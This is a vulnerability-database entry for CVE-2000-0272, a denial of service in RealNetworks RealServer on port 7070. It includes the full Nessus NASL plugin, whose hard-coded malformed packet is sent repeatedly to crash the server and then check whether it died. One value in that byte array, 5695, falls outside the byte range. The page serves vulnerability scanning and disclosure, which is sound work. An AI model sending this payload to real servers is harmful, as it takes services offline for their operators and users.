Vulnerabilities > CVE-2000-0272 - Unspecified vulnerability in Realnetworks Realserver

047910
CVSS 7.8 - HIGH
Attack vector
NETWORK
Attack complexity
LOW
Privileges required
NONE
Confidentiality impact
NONE
Integrity impact
NONE
Availability impact
COMPLETE
network
low complexity
realnetworks
nessus
exploit available

Summary

RealNetworks RealServer allows remote attackers to cause a denial of service by sending malformed input to the server at port 7070.

Exploit-Db

descriptionGameHouse dldisplay ActiveX control 0,Real Server 7.0 Port 7070 DoS. CVE-2000-0272 . Dos exploit for windows platform
idEDB-ID:19856
last seen2016-02-02
modified2000-04-20
published2000-04-20
reporterUssr Labs
sourcehttps://www.exploit-db.com/download/19856/
titleGameHouse dldisplay ActiveX control 0,Real Server 7.0 Port 7070 DoS

Nessus

NASL familyDenial of Service
NASL idREALSERVER_USSR_DOS.NASL
descriptionIt was possible to crash the remote RealServer by sending it a specially crafted packet.
last seen2020-06-01
modified2020-06-02
plugin id10377
published2000-04-22
reporterThis script is Copyright (C) 2000-2018 Tenable Network Security, Inc.
sourcehttps://www.tenable.com/plugins/nessus/10377
titleRealServer Port 7070 Malformed Input DoS
code
#
# (C) Tenable Network Security, Inc.
#

# Original exploit code : see http://www.ussrback.com
#


include("compat.inc");

if(description)
{
 script_id(10377);
 script_version ("1.25");
 script_cve_id("CVE-2000-0272");
 script_bugtraq_id(1128);
 
 script_name(english:"RealServer Port 7070 Malformed Input DoS");
 
 script_set_attribute(attribute:"synopsis", value:
"It is possible to crash the remote service." );
 script_set_attribute(attribute:"description", value:
"It was possible to crash the remote RealServer by sending 
it a specially crafted packet." );
 script_set_attribute(attribute:"solution", value:
"Upgrade to the most recent version of RealServer." );
 script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:P");
 script_set_cvss_temporal_vector("CVSS2#E:POC/RL:OF/RC:C");
 script_set_attribute(attribute:"exploitability_ease", value:"Exploits are available");
 script_set_attribute(attribute:"exploit_available", value:"true");
 script_set_attribute(attribute:"see_also", value:"http://service.real.com/help/faq/servg270.html" );

 script_set_attribute(attribute:"plugin_publication_date", value: "2000/04/22");
 script_set_attribute(attribute:"vuln_publication_date", value: "2000/04/20");
 script_cvs_date("Date: 2018/07/25 18:58:03");
script_set_attribute(attribute:"plugin_type", value:"remote");
script_set_attribute(attribute:"cpe",value:"cpe:/a:realnetworks:realserver");
script_end_attributes();

 
 script_summary(english:"crashes RealServer");
 script_category(ACT_DENIAL);	# ACT_FLOOD?
 script_copyright(english:"This script is Copyright (C) 2000-2018 Tenable Network Security, Inc.");
 script_family(english:"Denial of Service");
 script_require_ports(7070, "Services/realserver");
 script_dependencies("find_service1.nasl");
 exit(0);
}

include("global_settings.inc");
include("misc_func.inc");

function report(count, port)
{
 if(count)
   security_warning(port);
 exit(0);
} 

port = get_service(svc:"realserver", default: 7070, exit_on_fail: 1);

#
# Magic data made by USSR labs
#

die = raw_string(
80,78,65,0,10,0,20,0,2,0,1,0,4,0,255,255,255,255,255,255,
255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,
255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,
255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,
255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,
255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,
255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,
255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,
255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,
255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,
255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,
255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,
255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,
255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,
255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,
255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,
255,0,24,0,16,169,127,52,242,108,214,69,252,104,17,223,247,246,241,174,137,
0,0,95,29,67,196,99,0,41,87,105,110,57,5695,52,46,49,48,95,54,46,48,46,54,
46,52,53,95,112,108,117,115,51,50,95,77,80,54,48,95,101,115,45,65,82,95,53,
56,54,108,0,0,82,255,255,48,48,48,48,48,48,48,48,48,48,48,48,48,48,48,48,
48,48,48,48,48,48,48,48,48,48,48,121,13,10,0);


count = 0;

#
# Tests show that this bug is more effective 
# when done multiple times
#
for(i=0;i<20;i=i+1)
{
 soc = open_sock_tcp(port);
 if(soc)count = count + 1;
 else report(count:count, port:port);
 for(j=0;j<20;j=j+1)
 send(socket:soc, data:die);
 close(soc);
}

if (service_is_dead(port: port) > 0)
  security_warning(port);